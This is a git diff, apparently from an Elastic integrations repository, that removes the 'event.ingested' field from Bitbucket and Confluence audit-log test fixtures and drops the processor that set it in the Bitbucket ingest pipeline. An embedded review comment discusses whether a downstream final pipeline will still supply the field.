@@ -6663,7 +6579,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020834266Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036664,\"nano\":913000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -6751,7 +6666,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodificationrequested", - "ingested": "2021-12-24T00:37:41.020835009Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository change requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"TEST\",\"i18nKey\":\"bitbucket.service.repository.audit.changedvalue.repositorymodification.project\",\"key\":\"Project\",\"to\":\"AT\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.project\\\":\\\"TEST\\\",\\\"new.project\\\":\\\"AT\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":514000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -6839,7 +6753,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorymodified", - "ingested": "2021-12-24T00:37:41.020835809Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository settings changed\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorymodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"TEST\",\"i18nKey\":\"bitbucket.service.repository.audit.changedvalue.repositorymodification.project\",\"key\":\"Project\",\"to\":\"AT\"}],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.project\\\":\\\"TEST\\\",\\\"new.project\\\":\\\"AT\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":527000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -6914,7 +6827,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositoryaccessed", - "ingested": "2021-12-24T00:37:41.020836533Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository accessed by user\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositoryaccessed\",\"area\":\"END_USER_ACTIVITY\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036669,\"nano\":632000000},\"version\":\"1.0\"}", "type": [ "access" 
@@ -6981,7 +6893,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020837275Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036677,\"nano\":550000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -7060,7 +6971,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020837999Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:09.732Z - 2021-11-27T18:11:17.550Z\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"39 - 238\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036677,\"nano\":629000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -7130,7 +7040,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorydeletionrequested", - "ingested": "2021-12-24T00:37:41.020838728Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository deletion requested\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorydeletionrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036760,\"nano\":133000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -7205,7 +7114,6 @@ }, "event": { "action": "bitbucket.service.repository.audit.action.repositorydeleted", - "ingested": "2021-12-24T00:37:41.020839462Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"},{\"id\":\"1\",\"name\":\"test2\",\"type\":\"REPOSITORY\"}],\"auditType\":{\"action\":\"Repository deleted\",\"actionI18nKey\":\"bitbucket.service.repository.audit.action.repositorydeleted\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Repositories\",\"categoryI18nKey\":\"bitbucket.service.audit.category.repositories\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"project\\\":\\\"AT\\\",\\\"repository\\\":\\\"test2\\\"}\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT/test2\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036760,\"nano\":466000000},\"version\":\"1.0\"}", "type": [ "deletion" 
@@ -7272,7 +7180,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020840188Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036764,\"nano\":207000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -7351,7 +7258,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020840909Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"43 - 242\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:09.967Z - 2021-11-27T18:12:44.207Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036764,\"nano\":262000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -7416,7 +7322,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectdeletionrequested", - "ingested": "2021-12-24T00:37:41.020841973Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project deletion requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectdeletionrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036799,\"nano\":888000000},\"version\":\"1.0\"}", "type": [ "deletion" @@ -7486,7 +7391,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectdeleted", - "ingested": "2021-12-24T00:37:41.020842715Z", "original": "{\"affectedObjects\":[{\"id\":\"3\",\"name\":\"AT\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project deleted\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectdeleted\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"AT\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036799,\"nano\":960000000},\"version\":\"1.0\"}", "type": [ "deletion" 
@@ -7553,7 +7457,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020843448Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036804,\"nano\":368000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -7632,7 +7535,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020844243Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"47 - 246\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:10.643Z - 2021-11-27T18:13:24.368Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036804,\"nano\":428000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" 
@@ -7697,7 +7599,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectmodificationrequested", - "ingested": "2021-12-24T00:37:41.020844969Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project settings change requested\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectmodificationrequested\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036854,\"nano\":900000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -7785,7 +7686,6 @@ }, "event": { "action": "bitbucket.service.project.audit.action.projectmodified", - "ingested": "2021-12-24T00:37:41.020845700Z", "original": "{\"affectedObjects\":[{\"id\":\"2\",\"name\":\"TEST\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project settings changed\",\"actionI18nKey\":\"bitbucket.service.project.audit.action.projectmodified\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"Projects\",\"categoryI18nKey\":\"bitbucket.service.audit.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[{\"from\":\"Test\",\"i18nKey\":\"bitbucket.service.project.audit.changedvalue.projectmodified.name\",\"key\":\"Name\",\"to\":\"Test1\"},{\"i18nKey\":\"bitbucket.service.project.audit.changedvalue.projectmodified.description\",\"key\":\"Description\",\"to\":\"sdasdfasdf\"}],\"extraAttributes\":[{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"TEST\"},{\"name\":\"details\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.details\",\"value\":\"{\\\"old.name\\\":\\\"Test\\\",\\\"new.name\\\":\\\"Test1\\\",\\\"old.description\\\":null,\\\"new.description\\\":\\\"sdasdfasdf\\\"}\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036854,\"nano\":978000000},\"version\":\"1.0\"}", "type": [ "change" 
@@ -7852,7 +7752,6 @@ } }, "event": { - "ingested": "2021-12-24T00:37:41.020846428Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"User logged in\",\"actionI18nKey\":\"bitbucket.service.user.audit.action.authenticationsuccess\",\"area\":\"SECURITY\",\"category\":\"Authentication\",\"categoryI18nKey\":\"bitbucket.service.audit.category.authentication\",\"level\":\"FULL\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Authentication method\",\"nameI18nKey\":\"bitbucket.service.user.audit.attribute.authentication.authmethod\",\"value\":\"basic\"},{\"name\":\"target\",\"nameI18nKey\":\"bitbucket.audit.attribute.legacy.target\",\"value\":\"admin\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036858,\"nano\":395000000},\"version\":\"1.0\"}", "kind": "event", "action": "bitbucket.service.user.audit.action.authenticationsuccess", 
@@ -7931,7 +7830,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:37:41.020847150Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"2\",\"name\":\"admin\",\"type\":\"NORMAL\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"51 - 250\"},{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"200\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-27T17:29:10.661Z - 2021-11-27T18:14:18.395Z\"}],\"method\":\"Browser\",\"node\":\"8767044c-1b98-4d64-82db-ef29af8c3792\",\"source\":\"10.100.100.2\",\"system\":\"http://bitbucket.internal:7990\",\"timestamp\":{\"epochSecond\":1638036858,\"nano\":451000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" diff --git a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 336372f262b..685ebbd62df 100644 --- a/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_bitbucket/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' 
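Review bot: With the `set` processor for `event.ingested` gone from the top of `default.yml`, this audit pipeline no longer stamps an ingest time itself, so the field exists only if something downstream adds it. That is presumably Fleet's final pipeline, which this diff does not show. Bitbucket audit events indexed through this pipeline on a stack without that final pipeline, or when the pipeline is invoked directly, would lack `event.ingested`, a field commonly used for ingest-lag checks and for rules that query by ingest time. I would confirm that the package manifest's minimum stack version guarantees the final pipeline, and leave a comment where the processor was, e.g. `# event.ingested is set by the Fleet final pipeline, not by this pipeline`. The `processors:` list continues past the end of the hunk, so a later processor touching the field cannot be ruled out from here.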
diff --git a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json index a654fe9a7fa..50bdf4c2df6 100644 --- a/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json +++ b/packages/atlassian_confluence/data_stream/audit/_dev/test/pipeline/test-audit-api.log-expected.json @@ -69,7 +69,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837450218Z", "original": "{\"timestamp\":\"2021-11-23T00:44:36.398Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"79 - 178\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.166Z - 2021-11-23T00:43:12.188Z\"}]}", "type": "info", "kind": "event" 
@@ -152,7 +151,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837453799Z", "original": "{\"timestamp\":\"2021-11-23T00:43:12.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"76\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.149Z\"}]}", "type": "info", "kind": "event" 
@@ -235,7 +233,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837454941Z", "original": "{\"timestamp\":\"2021-11-23T00:41:45.280Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"77 - 176\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"100\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:39:37.155Z - 2021-11-23T00:41:17.165Z\"}]}", "type": "info", "kind": "event" 
@@ -318,7 +315,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:46:29.837456233Z", "original": "{\"timestamp\":\"2021-11-23T00:41:17.165Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"category\":\"Auditing\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"action\":\"Audit Log search performed\"},\"affectedObjects\":[],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[{\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"name\":\"ID Range\",\"value\":\"1 - 74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"name\":\"Query\",\"value\":\"\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"name\":\"Results returned\",\"value\":\"74\"},{\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"name\":\"Timestamp Range\",\"value\":\"2021-11-23T00:34:44.466Z - 2021-11-23T00:39:37.137Z\"}]}", "type": "info", "kind": "event" 
